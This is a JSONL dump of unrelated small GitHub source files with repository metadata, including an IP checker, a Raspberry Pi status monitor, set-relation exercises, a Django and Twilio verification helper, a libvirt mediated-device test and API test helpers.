\t\t\tfile_shell.write(\"wget \"+ ftp_addr)\n\nfile_out.close()\n## Author : lxue@uga.edu\n \n \n","repo_name":"liangjiaoxue/PythonNGSTools","sub_path":"Download_FTP_ENA.py","file_name":"Download_FTP_ENA.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"69"}
+{"seq_id":"1172599688","text":"#!/usr/bin/env python\n\nimport urllib.request as urlrequest\nimport re\n\n\ndef ip_v4():\n\trequest = urlrequest.urlopen(\"http://checkip.dyndns.org/\").read()\n\toutput = request.decode('utf-8')\n\n\tIPv4 = re.findall(\"\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}\", output)\n\tvalue = IPv4[0]\n\tprint (\"IP V4: \", value)\n\tprint (\"\")\n\ndef ip_v6():\n\trequest = urlrequest.urlopen(\"http://show-my-ip.de\").read()\n\toutput = request.decode('utf-8')\n\t\n\tIPv6 = re.findall(\"IP is (.+?) \", output)\n\tvalue = IPv6[0]\n\tx = (\":\")\n\tif x in value:\n\t\tprint(\"IP V6:\", value)\n\t\tprint(\"\")\n\telse:\n\t\tprint(\"IPv6: (only IPv4)\")\n\t\tprint(\"\")\n\n\nif __name__ == \"__main__\":\n\tprint (\"Getting externel IP\")\n\tprint (\"-\"*19)\n\tip_v4()\n\tip_v6()\n","repo_name":"sinooverride/Simple-Python-3.5","sub_path":"external_ip.py","file_name":"external_ip.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17726819390","text":"import tkinter as tk\nfrom tkinter import scrolledtext\nimport time\nimport subprocess\nimport psutil\nimport paramiko\nimport os\n\n# Constants\nPRIVATE_KEY_PATH = \"/home/host/.ssh/id_rsa\"\nBYTES_IN_ONE_MIB = 1048576 # 1024 * 1024\nENABLE_DEBUG = False\nos.environ['DISPLAY'] = ':0'\n\ndef debug_log(message):\n if ENABLE_DEBUG:\n print(f\"[DEBUG] {message}\")\n\n\ndef get_local_voltage():\n try:\n debug_log(\"Executing vcgencmd measure_volts to get voltage.\")\n output = subprocess.check_output(['vcgencmd', 'measure_volts'], text=True)\n voltage = output.strip().replace('volt=', '').replace('V', ' V')\n return voltage\n except Exception as e:\n debug_log(f\"Couldn't fetch voltage. Error: {e}\")\n return \"N/A\"\n\n\ndef check_service_status(service_name):\n debug_log(f\"Checking service status for {service_name}\")\n try:\n subprocess.check_call(['systemctl', 'is-active', '--quiet', service_name])\n return True\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return False\n\n\ndef check_internet_status():\n debug_log(\"Checking internet status\")\n try:\n subprocess.check_output(['ping', '-c', '1', '8.8.8.8'])\n return True\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return False\n\n\ndef get_ssh_connections():\n debug_log(\"Fetching SSH connections\")\n try:\n output = subprocess.check_output(['netstat', '-tn'], text=True)\n debug_log(f\"Raw netstat output: {output}\")\n \n lines = output.strip().split('\\n')\n ssh_connections = [line for line in lines if '22' in line.split()[3] and 'ESTABLISHED' in line.split()[5]]\n debug_log(f\"Filtered SSH connections: {ssh_connections}\")\n \n details = []\n for line in ssh_connections:\n elements = line.split()\n local_addr = elements[3]\n remote_addr = elements[4]\n details.append(f\"{local_addr} <-> {remote_addr}\")\n return len(ssh_connections), details\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return \"N/A\", []\n\n\ndef get_remote_info(host, username, port=22):\n try:\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey(filename=PRIVATE_KEY_PATH)\n client.connect(host, port, username=username, pkey=mykey)\n\n commands = {\n 'Temperature': 'vcgencmd measure_temp',\n 'CPU Load': \"cat /proc/loadavg | awk '{print $1,$2,$3}'\",\n 'Free Disk Space': \"df -h / | awk 'NR==2 {print $4}'\",\n 'Uptime': 'uptime -p',\n 'Voltage and Throttle Status': 'vcgencmd get_throttled'\n }\n\n info = {}\n for key, command in commands.items():\n stdin, stdout, stderr = client.exec_command(command)\n output = stdout.read().decode('utf-8').strip()\n info[key] = output\n\n client.close()\n return info\n\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return None\n\n\ndef get_system_info():\n debug_log(\"Fetching system information\")\n\n cpu_percent = psutil.cpu_percent(interval=1)\n ram = psutil.virtual_memory()\n disk = psutil.disk_usage('/')\n net_io = psutil.net_io_counters()\n sent = net_io.bytes_sent / BYTES_IN_ONE_MIB\n received = net_io.bytes_recv / BYTES_IN_ONE_MIB\n local_voltage = get_local_voltage()\n local_volt_throttle_status = subprocess.check_output(['vcgencmd', 'get_throttled'], text=True).strip()\n remote_info = get_remote_info('192.168.4.114', 'pkvirus')\n\n smb_status = check_service_status('smbd')\n internet_status = check_internet_status()\n ssh_connection_count, ssh_connection_details = get_ssh_connections()\n\n output = f\"===== Local System Status =====\\n\"\n output += f\"CPU Usage: {cpu_percent}%\\nRAM Usage: {ram.percent}%\\nDisk Usage: {disk.percent}%\\n\"\n output += f\"Voltage: {local_voltage}\\nLocal Voltage and Throttle Status: {local_volt_throttle_status}\\n\"\n output += f\"Data Sent: {sent:.2f} MiB\\nData Received: {received:.2f} MiB\\n\"\n output += f\"SMB Status: {'Up' if smb_status else 'Down'}\\nInternet Status: {'Up' if internet_status else 'Down'}\\n\"\n output += f\"SSH Connections: {ssh_connection_count}\\n\"\n for detail in ssh_connection_details:\n output += f\" - {detail}\\n\"\n output += \"==================================\\n\"\n\n if remote_info is not None:\n output += \"===== Remote System Status =====\\n\"\n output += f\"Temperature: {remote_info.get('Temperature', 'N/A')}\\n\"\n output += f\"CPU Load: {remote_info.get('CPU Load', 'N/A')}\\n\"\n output += f\"Free Disk Space: {remote_info.get('Free Disk Space', 'N/A')}\\n\"\n output += f\"Uptime: {remote_info.get('Uptime', 'N/A')}\\n\"\n output += f\"Voltage and Throttle Status: {remote_info.get('Voltage and Throttle Status', 'N/A')}\\n\"\n else:\n output += \"Could not fetch remote system information\\n\"\n\n if \"0x00001\" in local_volt_throttle_status:\n output += \"WARNING: Local Under-voltage detected!\\n\"\n if \"0x00004\" in local_volt_throttle_status:\n output += \"WARNING: Local Throttling active!\\n\"\n\n output += \"=========================\\n\"\n\n return output\n\n\nclass SystemStatusMonitor(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"System Status Monitor\")\n self.geometry(\"600x600\")\n\n self.text_widget = scrolledtext.ScrolledText(self, wrap=tk.WORD, width=70, height=30)\n self.text_widget.pack()\n\n self.refresh()\n\n def refresh(self):\n try:\n output = get_system_info()\n self.text_widget.config(state=tk.NORMAL)\n self.text_widget.delete(\"1.0\", tk.END)\n self.text_widget.insert(tk.INSERT, output)\n self.text_widget.config(state=tk.DISABLED)\n self.after(5000, self.refresh)\n except Exception as e:\n self.text_widget.insert(tk.INSERT, f\"An error occurred: {e}\")\n self.text_widget.config(state=tk.DISABLED)\n\n\nif __name__ == \"__main__\":\n app = SystemStatusMonitor()\n app.mainloop()\n","repo_name":"PKHarsimran/RaspiTFTServerStatus","sub_path":"MainTFTwithXS.py","file_name":"MainTFTwithXS.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23204990890","text":"# Edit these to configure your set and relation.\nparam1 = {1, 2, 3, 4, 5}\nparam2 = {(1, 2), (2, 3), (1, 3), (2, 2)}\n\n\n\n\n\n\ndef Is_reflexive(set1, set2):\n# Checks if a relation is reflexive\n # Empty set to catch integers used in relation\n domain_integers = set()\n # Iterating through the tuples of the relations\n for tuple in set2:\n # If the tuple is reflexive we add it to the domain set.\n if tuple[0] == tuple[1]:\n domain_integers.add(tuple[0])\n \n # Defining the integers that were not reflexive in the above iteration.\n reflexive_test_integers = set1 - domain_integers\n # Iterate by each of these found values, through tuples in set2\n for integer in reflexive_test_integers:\n for tuple in set2:\n # Did we find any relations on these non-reflexive integers? If not we push on.\n if integer == tuple[0]:\n return f\"Is R reflexive? No, '{integer}' in the domain has a relation but not to itself.\"\n\n # We can infer that if domain integers is a subset of our set1 after catching all other cases, we can say it is reflexive.\n if domain_integers.issubset(set1):\n return \"Yes\"\n \n\n\n\ndef Is_symmetric(set2):\n # Iterating to go through each tuple's elements\n for tuple in set2:\n # Defining a new tuple that is the inverse of the tuple we are using to iterate with.\n new_tuple = (tuple[1], tuple[0])\n # If the new tuple is in our set, then we know it is symmetric so we can continue.\n if new_tuple in set2:\n continue\n # If we don't find the tuple we're looking for, it's not symmetrical.\n else:\n return f\"Is R symmetric? No, {tuple} not symmetrical\"\n # Returning yes to print that it is symmetrical.\n return \"Yes\"\n\n\n\n\ndef Is_transitive(set2):\n # Iterating two tuples to find cases where the values connect to each other.\n for tuple1 in set2:\n for tuple2 in set2:\n if tuple1[1] == tuple2[0]:\n # If that's all good, we can get into our 3rd tuple. We check here that the value of tuple2 can map to the same endpoint as tuple3.\n for tuple3 in set2:\n if tuple2[1] == tuple3[1]:\n # If it does, we define a new simulated tuple to test over our relation. We want to go from Point A to Point C directly.\n new_tuple = (tuple1[0], tuple3[1])\n # If we don't find it, we can finally say it's not transitive.\n if new_tuple not in set2:\n return f\"Is R transitive? No, you cannot get from {tuple1[0]} to {tuple3[0]} with a shortcut.\"\n # Else continue used to reset the iterator to the next tuple3 case if it was found in there.\n else:\n continue\n # Else continue used to reset the iterator to the next tuple1 and tuple2 match case if it was not found in there.\n else:\n continue\n # Yes statement to show that it is true.\n return \"Is R transitive? Yes\"\n\n# Catch all function to show the entire solution. Call this at the top!\ndef what_is_this_function(param1, param2):\n print(f\"Set A = {param1}\")\n print(f\"Rel R = {param2}\")\n print(Is_reflexive(param1, param2))\n print(Is_symmetric(param2))\n print(Is_transitive(param2))\n\n# Executing the big function to display all the results.\nwhat_is_this_function(param1, param2)","repo_name":"OliWongDev/Reflexive-Symmetric-Transitive-Functions","sub_path":"relations-and-sets-python-challenges.py","file_name":"relations-and-sets-python-challenges.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"33452376345","text":"# import the necessary packages\nfrom __future__ import print_function\nimport numpy as np\nimport argparse\nimport cv2\n\nmatrix = np.array([ [69, 124, 136, 220], \n [64, 112, 198, 200], \n [26, 89, 156, 21], \n [36, 78, 241, 180]\n ])\n\n\n#matrix = matrix.astype(\"uint8\")\n\n\"\"\"\ndef adjust_gamma(image, gamma):\n\n\t# build a lookup table mapping the pixel values [0, 255] to\n\t# their adjusted gamma values\n\ttable = np.array([((i / 255.0) ** gamma) * 255\n\t\tfor i in np.arange(0, 256)]).astype(\"uint8\")\n\t# apply gamma correction using the lookup table\n\treturn cv2.LUT(image, table)\n\nadjusted = adjust_gamma(matrix, 1.8)\nprint(adjusted)\nprint(\"Lmax:\",np.max(adjusted))\nprint(\"Lmin:\",np.min(adjusted))\nprint(\"Lsr:\",np.sum(adjusted)/16) \n\"\"\"\n\ndef blur(a):\n kernel = np.array([[1/9,1/9,1/9], [1/9,1/9,1/9], [1/9,1/9,1/9]])\n kernel = kernel / np.sum(kernel)\n arraylist = []\n for y in range(3):\n temparray = np.copy(a)\n temparray = np.roll(temparray, y - 1, axis=0)\n for x in range(3):\n temparray_X = np.copy(temparray)\n temparray_X = np.roll(temparray_X, x - 1, axis=1)*kernel[y,x]\n arraylist.append(temparray_X)\n\n arraylist = np.array(arraylist)\n arraylist_sum = np.sum(arraylist, axis=0)\n return arraylist_sum\n\navg=blur(matrix)\nprint(avg)\nprint(\"Lmax:\",np.max(avg))\nprint(\"Lmin:\",np.min(avg))\nprint(\"Lsr:\",np.sum(avg)/16) \n\n\"\"\"\ndef gaussian(sigma,Y,X):\n kernel = np.zeros((Y,X))\n ax = range(X) - np.floor(X/2)\n ay = range(Y) - np.floor(Y/2)\n xx,yy = np.meshgrid(ax,ay)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)))/np.square(sigma)\n kernel = kernel/np.sum(kernel)\n return kernel \n\"\"\"\n","repo_name":"Mihael283/Multimedijski_sustavi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33671571067","text":"import operator\n\nOPERATORS = {\"+\": operator.add, \"-\": operator.sub, \"*\": operator.mul, \"/\": operator.truediv}\n\n\ndef evaluate_rpn(expression, operators):\n operands = []\n\n for symbol in expression:\n if symbol in operators:\n second, first = operands.pop(), operands.pop()\n operands.append(operators[symbol](first, second))\n else:\n operands.append(symbol)\n\n return operands.pop()\n\n\nif __name__ == \"__main__\":\n print(evaluate_rpn([5, 2, 1, \"-\", \"*\", 4, \"+\"], OPERATORS))\n","repo_name":"dexter2206/algorytmy-i-struktury-danych-pytktw4","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18974161581","text":"#-*- coding: utf-8 -*-\n\nimport PRi.GPIO as gpio\nimport time\n\nled1 = 20\nled2 = 21\nsensor = 17\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(led1, GPIO.OUT)\nGPIO.setup(led2, GPIO.OUT)\nGPIO.setup(sensor, GPIO.IN)\n\nprint(\"PIR 준비\")\ntime.sleep(3)\n\ntry:\n while(1):\n if GPIO.input(sensor) == 1:\n GPIO.output(led2,1)\n GPIO.output(led1,0)\n print(\"동작감지\")\n time.sleep(0.2)\n \n elif GPIO.input(sensor) == 0:\n GPIO.output(led1,1)\n GPIO.output(led2,0)\n time.sleep(0.2)\n \nexcept KeyboardInterrupt:\n print(\"정지\")\n GPIO.cleanup()","repo_name":"ChaehwanLee/Practice","sub_path":"led1.py","file_name":"led1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29271780220","text":"#-*- coding: utf-8 -*-\n#!/usr/bin/python3\n#Filename: randata.py\n#Author: JinQian Chen\n#Email: 2012chenjinqian@gmail.com\n#License: GPL\n\nimport random\n#print(\"Now importing randata\") #print only when first time imported.\ndef getran(num, rang):\n \"\"\"\n getran(n, R), make a list with n numbers of rang R.\n \"\"\"\n a = []\n i = 0\n while i < num:\n a.append(random.randint(0, rang))\n i += 1\n return a\n\ndef getzero(num):\n a = []\n i = 0\n while i < num:\n a.append(0)\n i += 1\n return a\n","repo_name":"chenjinqian/snack_sort","sub_path":"randata.py","file_name":"randata.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20093279642","text":"def solution(N, stages):\n people_challenged = len(stages)\n failure_rate = [0] * (N + 2)\n for stage in stages:\n failure_rate[stage] += 1\n\n for i in range(1, N + 1):\n if people_challenged > 0:\n temp = failure_rate[i]\n failure_rate[i] /= people_challenged\n people_challenged -= temp\n else:\n break\n\n return [i[0] + 1 for i in sorted(enumerate(failure_rate[1:-1]), key=lambda x: (-x[1], x[0]))]\n\nprint(solution(5, [2, 1, 2, 6, 2, 4, 3, 3]\t))\nprint(solution(4, [4, 4, 4, 4]\t))\n\n\n# def solution(N, stages):\n# fail = [[x+1] for x in range(N)]\n# sum_of_fail = 0\n# for i in range(N):\n# if sum_of_fail != len(stages):\n# failure_rate = stages.count(i+1) / (len(stages) - sum_of_fail)\n# sum_of_fail = sum_of_fail + stages.count(i+1)\n# fail[i].append(failure_rate)\n# else:\n# fail[i].append(0)\n# fail.sort(key=lambda x:x[1], reverse=True)\n# answer = [fail[i][0] for i in range(N)]\n# return answer","repo_name":"jinistic/algorithms","sub_path":"ndb coding test/11-25 실패율.py","file_name":"11-25 실패율.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72261597661","text":"\"\"\"Test the :mod:`dgp.ga_optimizer.__init__` module.\"\"\"\nimport unittest\n\nfrom dgp import ga_optimizer\nfrom dgp.utils import read_proben1_partition\n\n\nclass TestGeneticAlgorithm(unittest.TestCase):\n \"\"\"Test the genetic_algorithm.\"\"\"\n\n def test_genetic_algorithm(self):\n \"\"\"Run the genetic algorithm a few times and check if it works.\"\"\"\n first_weights, best_weights = ga_optimizer.genetic_algorithm(\n self.dataset,\n 5,\n 10,\n (6, 6),\n (1, 3),\n 0.5,\n 0.2,\n 0.75,\n 0.3,\n 0.3,\n False,\n 123112432,\n )\n first_score = ga_optimizer.utils.test_individual(\n first_weights, self.dataset\n )\n best_score = ga_optimizer.utils.test_individual(\n best_weights, self.dataset\n )\n self.assertLess(best_score[0], first_score[0])\n self.assertGreater(best_score[2], first_score[2])\n\n def setUp(self):\n \"\"\"Setup the model to run the algorithm.\"\"\"\n self.dataset = read_proben1_partition(\"cancer1\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"lulivi/dgp-lib","sub_path":"tests/ga_optimizer/test__init__.py","file_name":"test__init__.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40447702588","text":"'''\n풀이 참조\n전형적인 DP, LIS 유형 문제(가장 긴 부분 수열을 구하는 문제)\n\n자신보다 왼쪽에 작은 수가 얼마나 많이 있는지를 확인하는 문제.\n이게 왜 dp일까, dp table에 자신 보다 왼쪽에 있는 수 중에 작은 부분 배열의 최대 길이를 넣는다.\ndp Table을 쓰기 때문에 왼쪽 부분의 부분 배열을 매번 찾는 반복문을 줄여준다.\n\ninput\n7\n15 11 4 8 5 2 4\n'''\n\nn = int(input())\ncnt = 0\n\nsoldiers = list(map(int, input().split()))\nsoldiers.reverse()\ndp = [1] * n #부분 수열의 명 수 표시 #해당 인덱스까지의 연속된 숫자\n\nfor i in range(1, n):\n for j in range(0, i):\n if soldiers[j] < soldiers[i]:\n dp[i] = max(dp[i], dp[j] + 1)\n\nprint(n - max(dp))","repo_name":"Mminy62/icote-python","sub_path":"16/chap16_4.py","file_name":"chap16_4.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24465586692","text":"# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n\nimport sys, os, datetime, errno\nimport logging\nfrom scrapy.log import ScrapyFileLogObserver\n\ntry:\n import sys, os, datetime, errno\n today = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n logdir = None\n # ACCUM is the root directory\n try:\n accum = os.environ[\"ACCUM\"]\n except:\n accum = \"/lfs1/users/wat\"\n logdir = os.path.join(accum, \"log/escort/%s/www.eros.com/\" % today)\n # ensure log directory exists\n try:\n os.makedirs(logdir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n logfile = open(os.path.join(logdir, \"scrapy.log\"), 'a')\n log_observer = ScrapyFileLogObserver(logfile, level=logging.DEBUG)\n log_observer.start()\n\nexcept Exception as e:\n print >> sys.stderr, \"Failed to create log dir %r [%r]\" % (logdir, e)\n\nimport sys\nprint >> sys.stderr, \"SETTINGS: log file %r\" % logfile\n","repo_name":"usc-isi-i2/dig-crawl","sub_path":"eroscrawl/eroscrawl/spiders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436792319","text":"import logging\nimport re\n\nfrom avocado.core.exceptions import TestFail\nfrom virttest import virsh\nfrom virttest.libvirt_xml.nodedev_xml import NodedevXML, MdevXML\nfrom provider.vfio import ccw\n\n\nLOG = logging.getLogger(\"avocado.\" + __name__)\n\n\ndef get_device_xml(schid):\n \"\"\"\n Returns the nodedev device xml path.\n\n :param schid: the subchannel id for the ccw device, e.g. 0.0.0062\n \"\"\"\n\n parent_name = \"css_\" + schid.replace(\".\", \"_\")\n device_xml = NodedevXML()\n device_xml['parent'] = parent_name\n mdev_xml = MdevXML()\n mdev_xml['type_id'] = 'vfio_ccw-io'\n mdev_xml['uuid'] = '8d312cf6-f92a-485c-8db8-ba9299848f46'\n device_xml.set_cap(mdev_xml)\n return device_xml.xml\n\n\ndef get_device_name():\n \"\"\"\n Returns first defined but not started\n mdev device name.\n \"\"\"\n\n try:\n result = virsh.nodedev_list(cap=\"mdev\", options=\"--all\", ignore_status=False, debug=True)\n return result.stdout.strip().splitlines()[0]\n except:\n raise TestFail(\"Mdev device not found.\")\n\n\ndef check_autostart(device_name):\n \"\"\"\n Check if device is configured to autostart\n\n :param device_name: nodedev device name\n :raises: TestFail if autostart is not configured\n \"\"\"\n result = virsh.nodedev_info(device_name, ignore_status=False, debug=True)\n if not re.findall(\"Autostart.*yes\", result.stdout_text):\n raise TestFail(\"Device %s not configured to autostart.\" % device_name)\n\n\ndef run(test, params, env):\n \"\"\"\n Round trip for persistent setup via nodedev API:\n define, set autostart, start, destroy, undefine\n\n The test assumes no other mediated device is available\n in the test environment.\n\n A typical node device xml would look like:\n \n css_0_0_0062 \n \n \n 8d312cf6-f92a-485c-8db8-ba9299848f46 \n \n \n \"\"\"\n\n schid = None\n\n try:\n schid, _ = ccw.get_device_info()\n ccw.set_override(schid)\n nodedev_file_path = get_device_xml(schid)\n virsh.nodedev_define(nodedev_file_path, ignore_status=False, debug=True)\n device_name = get_device_name()\n virsh.nodedev_autostart(device_name, ignore_status=False, debug=True)\n check_autostart(device_name)\n virsh.nodedev_start(device_name, ignore_status=False, debug=True)\n virsh.nodedev_destroy(device_name, ignore_status=False, debug=True)\n virsh.nodedev_undefine(device_name, ignore_status=False, debug=True)\n finally:\n if schid:\n ccw.unset_override(schid)\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/virsh_cmd/nodedev/virsh_nodedev_persistence_mdev.py","file_name":"virsh_nodedev_persistence_mdev.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"41397363977","text":"from tkinter import *\n\nclass Gui(Tk):\n\n def __init__(self):\n super().__init__()\n \n # load resources\n self.first_cactus_image = PhotoImage(file=\"cacto.gif\")\n self.second_cactus_image = PhotoImage(file=\"cacti.gif\")\n \n # set window attributes\n self.title(\"Cactus Flipping\")\n \n # add components\n self.__add_heading_label()\n self.__add_cactus_image_label()\n self.__add_flip_button()\n\n def __add_heading_label(self):\n #create\n self.heading_label = Label()\n self.heading_label.grid(row=0, column=0, pady=20)\n #style\n self.heading_label.configure(text=\"Cactus\",\n font=\"Ariel 25\",\n fg=\"#008080\")\n\n def __add_cactus_image_label(self):\n #create\n self.cactus_image_label = Label()\n self.cactus_image_label.grid(row=1, column=0)\n #style\n self.cactus_image_label.configure(image=self.first_cactus_image,\n height=500,\n width=500)\n\n def __add_flip_button(self):\n #create\n self.flip_button = Button()\n self.flip_button.grid(row=2, column=0, ipadx=100, pady=20)\n #style\n self.flip_button.configure(text=\"Flip\",\n font=\"Ariel 16\",\n fg=\"#ffffff\",\n bg=\"#008080\")\n #events\n self.flip_button.bind(\"\", self.__left_mouse_clicked)\n self.flip_button.bind(\"\", self.__right_mouse_clicked)\n \n\n def __left_mouse_clicked(self, event):\n #display\n self.cactus_image_label.configure(image = self.second_cactus_image)\n self.heading_label.configure(text=\"\")\n \n\n def __right_mouse_clicked(self, event):\n #display\n self.cactus_image_label.configure(image = self.first_cactus_image)\n self.heading_label.configure(text=\"Cactus\")\n \n\n# Create an object of the Gui class when this module is executed\nif (__name__ == \"__main__\"):\n gui = Gui()\n gui.mainloop()\n","repo_name":"ashishrain/com404","sub_path":"2-guis/4-images/2-swapping/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72714711261","text":"import re\nimport threading\nfrom distutils.command.config import config\n\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom rest_framework.exceptions import ValidationError\nfrom twilio.rest import Client\n\nemail_regex = re.compile(r\"\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,7}\\b\")\nphone_regex = re.compile(r\"(\\+[0-9]+\\s*)?(\\([0-9]+\\))?[\\s0-9\\-]+[0-9]+\")\n\n\ndef check_email_or_phone(email_or_phone):\n if re.fullmatch(email_regex, email_or_phone):\n email_or_phone = \"email\"\n\n elif re.fullmatch(phone_regex, email_or_phone):\n email_or_phone = \"phone\"\n\n else:\n data = {\n 'success': False,\n 'message': \"Email yoki telefon raqamingiz noto'g'ri\"\n }\n raise ValidationError(data)\n return email_or_phone\n\n\nclass EmailThread(threading.Thread):\n\n def __init__(self, email):\n self.email = email\n threading.Thread.__init__(self)\n\n def run(self):\n self.email.send()\n\n\nclass Email:\n @staticmethod\n def send_email(data):\n email = EmailMessage(\n subject=data['subject'],\n body=data['body'],\n to=[data['to_email']]\n )\n if data.get('content_type') == \"html\":\n email.content_subtype = 'html'\n EmailThread(email).start()\n\n\ndef send_email(email, code):\n html_content = render_to_string(\n 'email/authentication/activate_account.html',\n {\"code\": code}\n )\n Email.send_email(\n {\n \"subject\": \"Royhatdan otish\",\n \"to_email\": email,\n \"body\": html_content,\n \"content_type\": \"html\"\n }\n )\n\n\ndef send_phone_code(phone, code):\n accound_sid = config(\"accound_sid\")\n auth_token = config(\"auth_token\")\n client = Client(accound_sid, auth_token)\n client.messages.create(\n body=f\"Salom do'stim! sizning tasdiqlash kodingiz: {code}\\n\",\n from_=\"+998947267726\",\n to=f\"{phone}\"\n )\n","repo_name":"nizomiddin-rakhimberdiev/instagram-clone","sub_path":"shared/utilits.py","file_name":"utilits.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74180455580","text":"# -*- coding: utf-8 -*-\n\nimport threading\nimport json\nfrom PySide6.QtCore import QObject, Signal\n\nfrom action import Action\nfrom converter import Converter\nfrom column import ColumnStatus\n\nclass ConvertThread(QObject):\n thread_signal = Signal(str)\n\n def __init__(self, parent):\n super().__init__(parent)\n self.threads = []\n\n @staticmethod\n def gen_msg(file_id, status, msg):\n content = {'file_id': file_id, 'status': status, 'msg': msg}\n return json.dumps(content)\n\n def start(self, file_id):\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Start.value, ''))\n\n def convert(self, file_id, src_file, dst_file, action):\n try:\n print('convert: ', src_file, '|', dst_file, '|', action)\n\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Running.value, ''))\n\n Converter.convert(src_file, dst_file, action)\n\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.End.value, ''))\n except Exception as e:\n self.thread_signal.emit(self.gen_msg(file_id, ColumnStatus.Exception.value, str(e)))\n print(e)\n\n def add(self, file_id, src_file, dst_file, action):\n thread = None\n # noinspection PyBroadException\n try:\n thread = threading.Thread(target=self.convert, args=(file_id, src_file, dst_file, action))\n thread.start()\n except:\n thread = None\n print('thread exception')\n\n if thread:\n self.threads.append(thread)\n print('add: ', file_id, src_file, dst_file, action)\n\n def wait(self):\n # noinspection PyBroadException\n try:\n for thread in self.threads:\n thread.join()\n except:\n print('join exception')\n\n self.threads = []\n self.thread_signal.emit(self.gen_msg(-1, ColumnStatus.Done.value, ''))","repo_name":"iounce/PySidePDF","sub_path":"thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"35418774545","text":"import json\nimport os\nfrom elad_testing.src.utilities.wooAPIUtility import WooAPIUtility\n\nclass OrdersHelper(object):\n\n def __init__(self):\n self.cur_file_dir = os.path.dirname(os.path.realpath(__file__))\n self.woo_helper = WooAPIUtility()\n\n def create_order(self, additional_args=None):\n\n payload_temaplte = os.path.join(self.cur_file_dir,'..','data','create_order_payload.json')\n\n with open(payload_temaplte) as f:\n payload = json.load(f)\n\n # if the user adds more info to payload, then update it\n if additional_args:\n # assert if the additional_args is a dictionary\n assert isinstance(additional_args,dict), f\"Parameter additional_args must be a dictionary but found {type(additional_args)}\"\n payload.update(additional_args)\n\n\n rs_api = self.woo_helper.post('orders', params=payload, expected_status_code=201)\n\n return rs_api","repo_name":"eladSalti/backhand-rest-api-pytest","sub_path":"elad_testing/src/helpers/orders_helper.py","file_name":"orders_helper.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
